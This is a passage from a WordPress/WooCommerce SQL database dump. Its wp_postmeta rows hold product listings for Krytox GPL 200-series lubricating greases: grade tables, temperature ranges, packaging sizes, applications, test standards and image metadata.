width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6906, 784, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6907, 784, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6908, 784, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6909, 784, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6910, 784, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6911, 784, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6912, 784, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6913, 784, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6914, 784, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6915, 784, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6916, 784, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6917, 784, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6918, 784, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6919, 784, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6920, 784, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6921, 784, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6922, 784, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6923, 784, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6924, 784, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6925, 784, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6926, 784, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6927, 784, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6928, 784, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (6929, 784, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6930, 784, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6931, 784, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (6932, 784, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (6933, 784, '_ywtm_content_tab_description', 'Krytox GPL 200–207 greases are white buttery greases with\r\nall of the same properties as the Krytox GPL 100–107 oils that\r\nthey are made from, but they are in grease form.\r\n\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf">GPL PDF</a>'); 
INSERT INTO `wp_postmeta` VALUES (6934, 784, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6935, 784, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6936, 784, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6937, 784, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6938, 784, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (6939, 784, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Sheet";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (6940, 784, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6941, 784, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n 	<li>NSF H-1 Rated</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6966, 786, '_wp_attached_file', '2016/08/shutterstock_295431182.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6967, 786, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3072;s:6:"height";i:2048;s:4:"file";s:34:"2016/08/shutterstock_295431182.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_295431182-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_295431182-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_295431182-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_295431182-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_295431182-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_295431182-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_295431182-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_295431182-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6968, 787, '_wp_attached_file', '2016/08/shutterstock_295431191.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6969, 787, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3072;s:6:"height";i:2048;s:4:"file";s:34:"2016/08/shutterstock_295431191.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_295431191-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_295431191-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_295431191-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_295431191-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_295431191-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_295431191-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_295431191-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_295431191-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6970, 784, '_thumbnail_id', '786'); 
INSERT INTO `wp_postmeta` VALUES (6971, 784, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6972, 784, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6973, 788, '_edit_lock', '1475588330:2'); 
INSERT INTO `wp_postmeta` VALUES (6974, 788, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (6975, 788, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6976, 788, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6977, 788, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6978, 788, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6979, 788, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6980, 788, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6981, 788, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6982, 788, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6983, 788, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6984, 788, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6985, 788, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6986, 788, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6987, 788, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6988, 788, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6989, 788, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6990, 788, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6991, 788, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6992, 788, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6993, 788, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6994, 788, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6995, 788, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6996, 788, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6997, 788, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6998, 788, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6999, 788, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7000, 788, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (7001, 788, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7002, 788, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7003, 788, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7004, 788, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7005, 788, '_ywtm_content_tab_description', 'Krytox GPL 200–207 greases are white buttery greases with\r\nall of the same properties as the Krytox GPL 100–107 oils that\r\nthey are made from, but they are in grease form.\r\n\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf">GPL PDF</a>'); 
INSERT INTO `wp_postmeta` VALUES (7006, 788, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7007, 788, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7008, 788, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7009, 788, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7010, 788, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (7011, 788, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Sheet";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7012, 788, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7013, 788, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7036, 788, '_thumbnail_id', '778'); 
INSERT INTO `wp_postmeta` VALUES (7037, 788, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (7038, 788, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (7039, 789, '_edit_lock', '1483559327:2'); 
INSERT INTO `wp_postmeta` VALUES (7040, 789, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (7041, 789, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (7042, 789, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (7043, 789, '312_default_editor', '<strong>Krytox GPL 205 Properties</strong>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7044, 789, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7045, 789, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7046, 789, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7047, 789, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7048, 789, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7049, 789, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7050, 789, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7051, 789, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7052, 789, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (7053, 789, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7054, 789, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7055, 789, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7056, 789, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7057, 789, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7058, 789, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7059, 789, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7060, 789, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7061, 789, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7062, 789, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7063, 789, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7064, 789, '_upsell_ids', 'a:2:{i:0;i:347;i:1;i:410;}'); 
INSERT INTO `wp_postmeta` VALUES (7065, 789, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7066, 789, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (7067, 789, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7068, 789, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7069, 789, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7070, 789, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7071, 789, '_ywtm_content_tab_description', 'Krytox GPL 200–207 greases are white buttery greases with\r\nall of the same properties as the Krytox GPL 100–107 oils that\r\nthey are made from, but they are in grease form.\r\n\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf">GPL PDF</a>'); 
INSERT INTO `wp_postmeta` VALUES (7072, 789, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7073, 789, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7074, 789, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7075, 789, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7076, 789, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (7077, 789, '318_custom_list_file', 'a:1:{s:32:"453f1230407deb37cf6bf4b3cd427c5e";a:3:{s:4:"name";s:20:"GPL Comparison Sheet";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7078, 789, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7079, 789, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n 	<li>NSF H-1 Rated</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7103, 789, '_thumbnail_id', '774'); 
INSERT INTO `wp_postmeta` VALUES (7104, 789, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (7105, 789, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (7106, 790, '_edit_lock', '1486483050:2'); 
INSERT INTO `wp_postmeta` VALUES (7107, 790, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (7108, 790, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (7109, 790, '_stock_status', 'instock'); 
